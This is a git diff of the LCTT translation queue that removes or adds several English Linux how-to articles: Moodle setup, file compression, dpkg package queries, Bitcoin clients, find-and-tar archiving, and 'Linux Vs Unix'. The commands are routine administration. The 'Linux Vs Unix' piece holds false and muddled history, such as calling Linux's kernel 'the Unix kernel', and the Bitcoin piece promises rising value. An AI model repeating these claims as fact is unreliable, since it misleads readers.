||||
|
||||
Options Indexes FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Order allow,deny
|
||||
allow from all
|
||||
|
||||
ErrorLog /var/log/httpd/yourdomain.com-error_log
|
||||
CustomLog /var/log/httpd/yourdomain.com-access_log common
|
||||
|
||||
```
|
||||
|
||||
save the file and enable the virtual host
|
||||
```
|
||||
a2ensite yourdomain.com
|
||||
|
||||
Enabling site yourdomain.com.
|
||||
To activate the new configuration, you need to run:
|
||||
service apache2 reload
|
||||
```
|
||||
|
||||
Finally, reload the web server as suggested, for the changes to take effect
|
||||
```
|
||||
service apache2 reload
|
||||
```
|
||||
|
||||
### 9. Follow the on-screen instructions and complete the installation
|
||||
|
||||
Now, go to `http://yourdomain.com` and follow the on-screen instructions to complete the Moodle installation. For more information on how to configure and use Moodle, you can check their [official documentation][4].
|
||||
|
||||
You don't have to install Moodle on Ubuntu 16.04, if you use one of our [optimized Moodle hosting][5], in which case you can simply ask our expert Linux admins to install and configure the latest version of Moodle on Ubuntu 16.04 for you. They are available 24×7 and will take care of your request immediately.
|
||||
|
||||
**PS.** If you liked this post on how to install Moodle on Ubuntu 16.04, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
|
||||
|
||||
作者:[RoseHosting][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.rosehosting.com
|
||||
[1]:https://www.rosehosting.com/blog/wp-content/uploads/2017/12/How-to-Install-Moodle-on-Ubuntu-16.04.jpg
|
||||
[2]:https://moodle.com/hq
|
||||
[3]:https://www.rosehosting.com/cdn-cgi/l/email-protection
|
||||
[4]:https://docs.moodle.org/34/en/Main_page
|
||||
[5]:https://www.rosehosting.com/moodle-hosting.html
|
@ -1,144 +0,0 @@
|
||||
How to squeeze the most out of Linux file compression
|
||||
======
|
||||
If you have any doubt about the many commands and options available on Linux systems for file compression, you might want to take a look at the output of the **apropos compress** command. Chances are you'll be surprised by the many commands that you can use for compressing and decompressing files, as well as for comparing compressed files, examining and searching through the content of compressed files, and even changing a compressed file from one format to another (i.e., .z format to .gz format).
|
||||
|
||||
You're likely to see all of these entries just for the suite of bzip2 compression commands. Add in zip, gzip, and xz, and you've got a lot of interesting options.
|
||||
```
|
||||
$ apropos compress | grep ^bz
|
||||
bzcat (1) - decompresses files to stdout
|
||||
bzcmp (1) - compare bzip2 compressed files
|
||||
bzdiff (1) - compare bzip2 compressed files
|
||||
bzegrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzexe (1) - compress executable files in place
|
||||
bzfgrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzgrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzip2 (1) - a block-sorting file compressor,
|
||||
v1.0.6
|
||||
bzless (1) - file perusal filter for crt viewing
|
||||
of bzip2 compressed text
|
||||
bzmore (1) - file perusal filter for crt viewing
|
||||
of bzip2 compressed text
|
||||
|
||||
```
|
||||
|
||||
On my Ubuntu system, over 60 commands were listed in response to the apropos compress command.
|
||||
|
||||
### Compression algorithms
|
||||
|
||||
Compression is not a one-size-fits-all issue. Some compression tools are "lossy," such as those used to reduce the size of mp3 files while allowing listeners to have what is nearly the same musical experience as listening to the originals. But algorithms used on the Linux command line to compress or archive user files have to be able to reproduce the original content exactly. In other words, they have to be lossless.
|
||||
|
||||
How is that done? It's easy to imagine how 300 of the same character in a row could be compressed to something like "300X," but this type of algorithm wouldn't be of much benefit for most files because they wouldn't contain long sequences of the same character any more than they would completely random data. Compression algorithms are far more complex and have only been getting more so since compression was first introduced in the toddler years of Unix.
|
||||
|
||||
### Compression commands on Linux systems
|
||||
|
||||
The commands most commonly used for file compression on Linux systems include zip, gzip, bzip2 and xz. All of those commands work in similar ways, but there are some tradeoffs in terms of how much the file content is squeezed (how much space you save), how long the compression takes, and how compatible the compressed files are with other systems you might need to use them on.
|
||||
|
||||
Sometimes the time and effort of compressing a file doesn't pay off very well. In the example below, the "compressed" file is actually larger than the original. While this isn't generally the case, it can happen -- especially when the file content approaches some degree of randomness.
|
||||
```
|
||||
$ time zip bigfile.zip bigfile
|
||||
adding: bigfile (deflated 0%)
|
||||
|
||||
real 1m6.310s
|
||||
user 0m52.424s
|
||||
sys 0m2.288s
|
||||
$
|
||||
$ ls -l bigfile*
|
||||
-rw-rw-r-- 1 shs shs 1073741824 Dec 8 10:06 bigfile
|
||||
-rw-rw-r-- 1 shs shs 1073916184 Dec 8 11:39 bigfile.zip
|
||||
|
||||
```
|
||||
|
||||
Note that the compressed version of the file (bigfile.zip) is actually a little larger than the original file. If compression increases the size of a file or reduces its size by some very small percentage, the only benefit may be that you may have a convenient online backup. If you see a message like this after compressing a file, you're not gaining much.
|
||||
```
|
||||
(deflated 1%)
|
||||
|
||||
```
|
||||
|
||||
The content of a file plays a large role in how well it will compress. The file that grew in size in the example above was fairly random. Compress a file containing only zeroes, and you'll see an amazing compression ratio. In this admittedly extremely unlikely scenario, all three of the commonly used compression tools do an excellent job.
|
||||
```
|
||||
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
|
||||
-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2
|
||||
-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz
|
||||
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
|
||||
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
|
||||
|
||||
```
|
||||
|
||||
While impressive, you're not likely to see files with over 10 million bytes compressing down to fewer than 50, since files like these are extremely unlikely.
|
||||
|
||||
In this more realistic example, the size differences are altogether different -- and not very significant -- for a fairly small jpg file.
|
||||
```
|
||||
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
|
||||
-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2
|
||||
-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz
|
||||
-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz
|
||||
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
|
||||
|
||||
```
|
||||
|
||||
Do the same thing with a large text file, and you're likely to see some significant differences.
|
||||
```
|
||||
$ ls -l textfile*
|
||||
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
|
||||
-rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2
|
||||
-rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz
|
||||
-rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz
|
||||
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
|
||||
|
||||
```
|
||||
|
||||
In this case, xz reduced the size considerably more than the other commands with bzip2 coming in second.
|
||||
|
||||
### Looking at compressed files
|
||||
|
||||
The *more commands (bzmore and others) allow you to view the contents of compressed files without having to uncompress them first.
|
||||
```
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
lzmore (1) - view xz or lzma compressed (text) files
|
||||
xzmore (1) - view xz or lzma compressed (text) files
|
||||
zmore (1) - file perusal filter for crt viewing of compressed text
|
||||
|
||||
```
|
||||
|
||||
These commands are all doing a good amount of work, since they have to decompress a file's content just to display it to you. They do not, on the other hand, leave uncompressed file content on the system. They simply decompress on the fly.
|
||||
```
|
||||
$ xzmore textfile.xz | head -1
|
||||
Here is the agenda for tomorrow's staff meeting:
|
||||
|
||||
```
|
||||
|
||||
### Comparing compressed files
|
||||
|
||||
While several of the compression toolsets include a diff command (e.g., xzdiff), these tools pass the work off to cmp and diff and are not doing any algorithm-specific comparisons. For example, the xzdiff command will compare bz2 files as easily as it will compare xz files.
|
||||
|
||||
### How to choose the best Linux compression tool
|
||||
|
||||
The best tool for the job depends on the job. In some cases, the choice may depend on the content of the data being compressed, but it's more likely that your organization's conventions are just as important unless you're in a real pinch for disk space. The best general suggestions seem to be these:
|
||||
|
||||
**zip** is best when files need to be shared with or used on Windows systems.
|
||||
|
||||
**gzip** may be best when you want the files to be usable on any Unix/Linux system. Though bzip2 is becoming nearly as ubiquitous, it is likely to take longer to run.
|
||||
|
||||
**bzip2** uses a different algorithm than gzip and is likely to yield a smaller file, but they take a little longer to get the job done.
|
||||
|
||||
**xz** generally offers the best compression rates, but also takes considerably longer to run. It's also newer than the other tools and may not yet exist on all the systems you need to work with.
|
||||
|
||||
### Wrap-up
|
||||
|
||||
There are a number of choices when it comes to how to compress files and only a few situations in which they don't yield valuable disk space savings.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
|
||||
|
||||
作者:[Sandra Henry-Stocker][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.networkworld.com
|
126
sources/tech/20171214 Peeking into your Linux packages.md
Normal file
126
sources/tech/20171214 Peeking into your Linux packages.md
Normal file
@ -0,0 +1,126 @@
|
||||
(translating by runningwater)
|
||||
Peeking into your Linux packages
|
||||
======
|
||||
Do you ever wonder how many _thousands_ of packages are installed on your Linux system? And, yes, I said "thousands." Even a fairly modest Linux system is likely to have well over a thousand packages installed. And there are many ways to get details on what they are.
|
||||
|
||||
First, to get a quick count of your installed packages on a Debian-based distribution such as Ubuntu, use the command **apt list --installed** like this:
|
||||
```
|
||||
$ apt list --installed | wc -l
|
||||
2067
|
||||
|
||||
```
|
||||
|
||||
This number is actually one too high because the output contains "Listing..." as its first line. This command would be more accurate:
|
||||
```
|
||||
$ apt list --installed | grep -v "^Listing" | wc -l
|
||||
2066
|
||||
|
||||
```
|
||||
|
||||
To get some details on what all these packages are, browse the list like this:
|
||||
```
|
||||
$ apt list --installed | more
|
||||
Listing...
|
||||
a11y-profile-manager-indicator/xenial,now 0.1.10-0ubuntu3 amd64 [installed]
|
||||
account-plugin-aim/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
account-plugin-facebook/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-flickr/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-google/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-jabber/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
account-plugin-salut/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
|
||||
```
|
||||
|
||||
That's a lot of detail to absorb -- especially if you let your eyes wander through all 2,000+ files rolling by. It contains the package names, versions, and more but isn't the easiest information display for us humans to parse. The dpkg-query makes the descriptions quite a bit easier to understand, but they will wrap around your command window unless it's _very_ wide. So, the data display below has been split into the left and right hand sides to make this post easier to read.
|
||||
|
||||
Left side:
|
||||
```
|
||||
$ dpkg-query -l | more
|
||||
Desired=Unknown/Install/Remove/Purge/Hold
|
||||
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|
||||
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
|
||||
||/ Name Version
|
||||
+++-==============================================-=================================-
|
||||
ii a11y-profile-manager-indicator 0.1.10-0ubuntu3
|
||||
ii account-plugin-aim 3.12.11-0ubuntu3
|
||||
ii account-plugin-facebook 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-flickr 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-google 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-jabber 3.12.11-0ubuntu3
|
||||
ii account-plugin-salut 3.12.11-0ubuntu3
|
||||
ii account-plugin-twitter 0.12+16.04.20160126-0ubuntu1
|
||||
rc account-plugin-windows-live 0.11+14.04.20140409.1-0ubuntu2
|
||||
|
||||
```
|
||||
|
||||
Right side:
|
||||
```
|
||||
Architecture Description
|
||||
============-=====================================================================
|
||||
amd64 Accessibility Profile Manager - Unity desktop indicator
|
||||
amd64 Messaging account plugin for AIM
|
||||
all GNOME Control Center account plugin for single signon - facebook
|
||||
all GNOME Control Center account plugin for single signon - flickr
|
||||
all GNOME Control Center account plugin for single signon
|
||||
amd64 Messaging account plugin for Jabber/XMPP
|
||||
amd64 Messaging account plugin for Local XMPP (Salut)
|
||||
all GNOME Control Center account plugin for single signon - twitter
|
||||
all GNOME Control Center account plugin for single signon - windows live
|
||||
|
||||
```
|
||||
|
||||
The "ii" and "rc" designations at the beginning of each line (see "Left side" above) are package state indicators. The first letter represents the desirable package state:
|
||||
```
|
||||
u -- unknown
|
||||
i -- install
|
||||
r -- remove/deinstall
|
||||
p -- purge (remove including config files)
|
||||
h -- hold
|
||||
|
||||
```
|
||||
|
||||
The second represents the current package state:
|
||||
```
|
||||
n -- not-installed
|
||||
i -- installed
|
||||
c -- config-files (only the config files are installed)
|
||||
U -- unpacked
|
||||
F -- half-configured (the configuration failed for some reason)
|
||||
h -- half-installed (installation failed for some reason)
|
||||
W -- triggers-awaited (the package is waiting for a trigger from another package)
|
||||
t -- triggers-pending (the package has been triggered)
|
||||
|
||||
```
|
||||
|
||||
An added "R" at the end of the normally two-character field would indicate that reinstallation is required. You may never run into these.
|
||||
|
||||
One easy way to take a quick look at your overall package status is to count how many packages are in which of the different states:
|
||||
```
|
||||
$ dpkg-query -l | tail -n +6 | awk '{print $1}' | sort | uniq -c
|
||||
2066 ii
|
||||
134 rc
|
||||
|
||||
```
|
||||
|
||||
I excluded the top five lines from the dpkg-query output above because these are the header lines that would have confused the output.
|
||||
|
||||
The two lines basically tell us that on this system, 2,066 packages should be and are installed, while 134 other packages have been removed but have left configuration files behind. You can always remove a package's remaining configuration files with a command like this:
|
||||
```
|
||||
$ sudo dpkg --purge xfont-mathml
|
||||
|
||||
```
|
||||
|
||||
Note that the command above would have removed the package binaries along with the configuration files if both were still installed.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.networkworld.com/article/3242808/linux/peeking-into-your-linux-packages.html
|
||||
|
||||
作者:[Sandra Henry-Stocker][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
|
@ -0,0 +1,89 @@
|
||||
translating-----geekpi
|
||||
|
||||
5 of the Best Bitcoin Clients for Linux
|
||||
======
|
||||
By now you have probably heard of [Bitcoin][1] or the [Blockchain][2]. The price of Bitcoin has skyrocketed several times in the past months, and the trend continues almost daily. The demand for Bitcoin seems to grow astronomically by the minute.
|
||||
|
||||
Accompanying the demand for the digital currency is the demand for software to manage the currency: Bitcoin clients. A quick search of "Bitcoin client" on Google Play or the App Store will yield quite a number of results. There are many Bitcoin clients that support Linux, but only 5 interesting ones are mentioned here, in no particular order.
|
||||
|
||||
### Why Use a Client?
|
||||
A client makes it easy to manage your Bitcoin or Bitcoins. Many provide different levels of security to make sure you don't lose your precious digital currency. In short, you'll find it helpful, trust me.
|
||||
|
||||
#### 1. Bitcoin Core
|
||||
|
||||
![Bitcoin Core][3]
|
||||
|
||||
This is the core Bitcoin client, as the name suggests. It is has a very simple interface. It is secure and provides the best privacy compared to other popular clients. On the down side, it has to download all Bitcoin transaction history, which is over a 150 GB of data. Hence, it uses more resources than many other clients.
|
||||
|
||||
To get the Bitcoin Core client, visit the download [page][4]. Ubuntu users can install it via PPA:
|
||||
```
|
||||
sudo add-apt-repository ppa:bitcoin / bitcoin
|
||||
sudo apt update
|
||||
sudo apt install bitcoin*
|
||||
```
|
||||
|
||||
#### 2. Electrum
|
||||
![Electrum][5]
|
||||
|
||||
Electrum is another interesting Bitcoin client. It is more forgiving than most clients as funds can be recovered from a secret passphrase - no need to ever worry about forgetting keys. It provides several other features that make it convenient to manage Bitcoins such as multisig and cold storage. A plus for Electrum is the ability to see the fiat currency equivalent of your Bitcoins. Unlike Bitcoin Core, it does not require a full copy of your Bitcoin transaction history.
|
||||
|
||||
The following is how to get Electrum:
|
||||
```
|
||||
sudo apt-get install python3-setuptools python3-pyqt5 python3-pip
|
||||
sudo pip3 install https://download.electrum.org/3.0.3/Electrum-3.0.3.tar.gz
|
||||
```
|
||||
|
||||
Make sure to check out the appropriate version you want to install on the [website][6].
|
||||
|
||||
#### 3. Bitcoin Knots
|
||||
|
||||
![Bitcoin Knots][13]
|
||||
|
||||
Bitcoin Knots is only different from Bitcoin Core in that it provides more advanced features than Bitcoin Core. In fact, it is derived from Bitcoin Core. It is important to know some of these features are not well-tested.
|
||||
|
||||
As with Bitcoin Core, Bitcoin Knots also uses a huge amount of space, as a copy of the full Bitcoin transaction is downloaded.
|
||||
|
||||
The PPA and tar files can be found [here][7].
|
||||
|
||||
#### 4. Bither
|
||||
|
||||
![Bither][8]
|
||||
|
||||
Bither has a really simple user interface and is very simple to use. It allows password access and has an exchange rate viewer and cold/hot modes. The client is simple, and it works!
|
||||
|
||||
Download Bither [here][9].
|
||||
|
||||
#### 5. Armory
|
||||
|
||||
![Armory][10]
|
||||
|
||||
Armory is another common Bitcoin client. It includes numerous features such as cold storage. This enables you to manage your Bitcoins without connecting to the Internet. Moreover, there are additional security measures to ensure private keys are fully secured from attacks.
|
||||
|
||||
You can get the deb file from this download [site][11]. Open the deb file and install on Ubuntu or Debian. You can also get the project on [GitHub][12].
|
||||
|
||||
Now that you know a Bitcoin client to manage your digital currency, sit back, relax, and watch your Bitcoin value grow.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/bitcoin-clients-for-linux/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1]:https://www.maketecheasier.com/what-is-bitcoin-and-how-you-can-utilize-it-online/
|
||||
[2]:https://www.maketecheasier.com/bitcoin-blockchain-bundle-deals/
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png (Bitcoin Core)
|
||||
[4]:https://bitcoin.org/en/download
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/12/electrum-interface.png (Electrum)
|
||||
[6]:https://electrum.org/
|
||||
[7]:https://bitcoinknots.org/
|
||||
[8]:https://www.maketecheasier.com/assets/uploads/2017/12/bitter-interface.png (Bither)
|
||||
[9]:https://bither.net/
|
||||
[10]:https://www.maketecheasier.com/assets/uploads/2017/12/armory-logo2.png (Armory)
|
||||
[11]:https://www.bitcoinarmory.com/download/
|
||||
[12]:https://github.com/goatpig/BitcoinArmory
|
||||
[13]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png
|
@ -0,0 +1,120 @@
|
||||
How to find and tar files into a tar ball
|
||||
======
|
||||
|
||||
I would like to find all documents file *.doc and create a tarball of those files and store in /nfs/backups/docs/file.tar. Is it possible to find and tar files on a Linux or Unix-like system?
|
||||
|
||||
The find command used to search for files in a directory hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs.
|
||||
|
||||
[![How to find and tar files on linux unix][1]][1]
|
||||
|
||||
Let us see how to combine tar command with find command to create a tarball in a single command line option.
|
||||
|
||||
## Find command
|
||||
|
||||
The syntax is:
|
||||
```
|
||||
find /path/to/search -name "file-to-search" -options
|
||||
## find all Perl (*.pl) files ##
|
||||
find $HOME -name "*.pl" -print
|
||||
## find all *.doc files ##
|
||||
find $HOME -name "*.doc" -print
|
||||
## find all *.sh (shell scripts) and run ls -l command on it ##
|
||||
find . -iname "*.sh" -exec ls -l {} +
|
||||
```
|
||||
Sample outputs from the last command:
|
||||
```
|
||||
-rw-r--r-- 1 vivek vivek 1169 Apr 4 2017 ./backups/ansible/cluster/nginx.build.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1500 Dec 6 14:36 ./bin/cloudflare.pure.url.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/cmspostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/cmspreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/cmssuploadimage.sh -> uploadimage.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/faqpostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/faqpreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/faquploadimage.sh -> uploadimage.sh
|
||||
-rw-r--r-- 1 vivek vivek 778 Nov 6 14:44 ./bin/mirror.sh
|
||||
-rwxr-xr-x 1 vivek vivek 136 Apr 25 2015 ./bin/nixcraft.com.301.sh
|
||||
-rwxr-xr-x 1 vivek vivek 547 Jan 30 2017 ./bin/paypal.sh
|
||||
-rwxr-xr-x 1 vivek vivek 531 Dec 31 2013 ./bin/postupload.sh
|
||||
-rwxr-xr-x 1 vivek vivek 437 Dec 31 2013 ./bin/preupload.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1046 May 18 2017 ./bin/purge.all.cloudflare.domain.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/tipspostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/tipspreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/tipsuploadimage.sh -> uploadimage.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1193 Oct 18 2013 ./bin/uploadimage.sh
|
||||
-rwxr-xr-x 1 vivek vivek 29 Nov 6 14:33 ./.vim/plugged/neomake/tests/fixtures/errors.sh
|
||||
-rwxr-xr-x 1 vivek vivek 215 Nov 6 14:33 ./.vim/plugged/neomake/tests/helpers/trap.sh
|
||||
```
|
||||
|
||||
## Tar command
|
||||
|
||||
To [create a tar ball of /home/vivek/projects directory][2], run:
|
||||
```
|
||||
$ tar -cvf /home/vivek/projects.tar /home/vivek/projects
|
||||
```
|
||||
|
||||
## Combining find and tar commands
|
||||
|
||||
The syntax is:
|
||||
```
|
||||
find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} \;
|
||||
```
|
||||
OR
|
||||
```
|
||||
find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} +
|
||||
```
|
||||
For example:
|
||||
```
|
||||
find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" \;
|
||||
```
|
||||
OR
|
||||
```
|
||||
find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" +
|
||||
```
|
||||
Where, find command options:
|
||||
|
||||
* **-name "*.doc"** : Find file as per given pattern/criteria. In this case find all *.doc files in $HOME.
|
||||
* **-exec tar ...** : Execute tar command on all files found by the find command.
|
||||
|
||||
Where, tar command options:
|
||||
|
||||
* **-r** : Append files to the end of an archive. Arguments have the same meaning as for -c option.
|
||||
* **-v** : Verbose output.
|
||||
* **-f** : out.tar : Append all files to out.tar file.
|
||||
|
||||
|
||||
|
||||
It is also possible to pipe output of the find command to the tar command as follows:
|
||||
```
|
||||
find $HOME -name "*.doc" -print0 | tar -cvf /tmp/file.tar --null -T -
|
||||
```
|
||||
The -print0 option passed to the find command deals with special file names. The -null and -T - option tells the tar command to read its input from stdin/pipe. It is also possible to use the xargs command:
|
||||
```
|
||||
find $HOME -type f -name "*.sh" | xargs tar cfvz /nfs/x230/my-shell-scripts.tgz
|
||||
```
|
||||
See the following man pages for more info:
|
||||
```
|
||||
$ man tar
|
||||
$ man find
|
||||
$ man xargs
|
||||
$ man bash
|
||||
```
|
||||
|
||||
------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on Twitter, Facebook, Google+.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/linux-unix-find-tar-files-into-tarball-command/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/media/new/faq/2017/12/How-to-find-and-tar-files-on-linux-unix.jpg
|
||||
[2]:https://www.cyberciti.biz/faq/creating-a-tar-file-linux-command-line/
|
143
sources/tech/20171215 Linux Vs Unix.md
Normal file
143
sources/tech/20171215 Linux Vs Unix.md
Normal file
@ -0,0 +1,143 @@
|
||||
|
||||
translating by HardworkFish
|
||||
|
||||
[![Linux vs. Unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix-vs-linux_orig.jpg)][1]
|
||||
|
||||
In computer time, a substantial part of the population has a misconception that the **Unix** and **Linux** operating systems are one and the same. However, the opposite is true. Let's look at it from a closer look.
|
||||
|
||||
### What is Unix?
|
||||
|
||||
[![what is unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png)][2]
|
||||
|
||||
In IT, we come across
|
||||
|
||||
[Unix][3]
|
||||
|
||||
as an operating system (under the trademark), which was created by AT & T in 1969 in New Jersey, USA. Most operating systems are inspired by Unix, but Unix has also been inspired by the Multics system, which has not been completed. Another version of Unix was Plan 9 from Bell Labs.
|
||||
|
||||
### Where is Unix used?
|
||||
|
||||
As an operating system, Unix is used in particular for servers, workstations, and nowadays also for personal computers. It played a very important role in the creation of the Internet, the creation of computer networks or also the client-server model.
|
||||
|
||||
#### Characteristics of the Unix system:
|
||||
|
||||
* supports multitasking (multitasking)
|
||||
|
||||
* Simplicity of control compared to Multics
|
||||
|
||||
* all data is stored as plain text
|
||||
|
||||
* tree saving of a single-root file
|
||||
|
||||
* access to multiple user accounts
|
||||
|
||||
#### Unix Operating System Composition:
|
||||
|
||||
|
||||
|
||||
**a)**
|
||||
|
||||
a monolithic operating system kernel that takes care of low-level and user-initiated operations, the total communication takes place via a system call.
|
||||
|
||||
**b)**
|
||||
|
||||
system utilities (or so-called utilities)
|
||||
|
||||
**c)**
|
||||
|
||||
many other applications
|
||||
|
||||
### What is Linux?
|
||||
|
||||
[![what is linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png)][4]
|
||||
|
||||
This is an open source operating system built on the principle of a Unix system. As the name of the open-source description suggests, it is a freely-downloadable system that can be downloaded externally, but it is also possible to interfere with the system's editing, adding, and then extending the source code. It's one of the biggest benefits, unlike today's operating systems that are paid (Windows, Mac OS X, ...). Not only was Unix a model for creating a new operating system, another important factor was the MINIX system. Unlike
|
||||
|
||||
**Linus**
|
||||
|
||||
, this version was used by its creator (
|
||||
|
||||
**Andrew Tanenbaum**
|
||||
|
||||
) as a commercial system.
|
||||
|
||||
|
||||
|
||||
[Linux][5]
|
||||
|
||||
began to be developed by
|
||||
|
||||
**Linus Torvalds**
|
||||
|
||||
in 1991, which was a system that dealt with as a hobby. One of the main reasons why Linux started to deal with Unix was the simplicity of the system. The first official release of the provisory version of Linux (0.01) occurred on September 17, 1991\. Even though the system was completely imperfect and complete, it was of great interest to him, and within a few days, Linus started to write emails with other ideas about expansion or source codes.
|
||||
|
||||
### Characteristics of Linux
|
||||
|
||||
The cornerstone of Linux is the Unix kernel, which is based on the basic characteristics of Unix and the standards that are
|
||||
|
||||
**POSIX**
|
||||
|
||||
and Single
|
||||
|
||||
**UNIX Specification**
|
||||
|
||||
. As it may seem, the official name of the operating system is taken from the creator of
|
||||
|
||||
**Linus**
|
||||
|
||||
, where the end of the operating system name "x" is just a link to the
|
||||
|
||||
**Unix system**
|
||||
|
||||
.
|
||||
|
||||
#### Main features:
|
||||
|
||||
* run multiple tasks at once (multitasking)
|
||||
|
||||
* programs may consist of one or more processes (multipurpose system), and each process may have one or more threads
|
||||
|
||||
* multiuser, so it can run multiple user programs
|
||||
|
||||
* individual accounts are protected by appropriate authorization
|
||||
|
||||
* so the accounts have precisely defined system control rights
|
||||
|
||||
The author of
|
||||
|
||||
**Tuxe Penguin's**
|
||||
|
||||
logo is Larry Ewing of 1996, who accepted him as a mascot for his open-source
|
||||
|
||||
**Linux operating system**
|
||||
|
||||
.
|
||||
|
||||
**Linux Torvalds**
|
||||
|
||||
proposed the initial name of the new operating system as "Freax" as free + freak + x (
|
||||
|
||||
**Unix system**
|
||||
|
||||
), but it did not like the
|
||||
|
||||
**FTP server**
|
||||
|
||||
where the provisory version of Linux was running.
|
||||
|
||||
--------------------------------------------------------------------------------
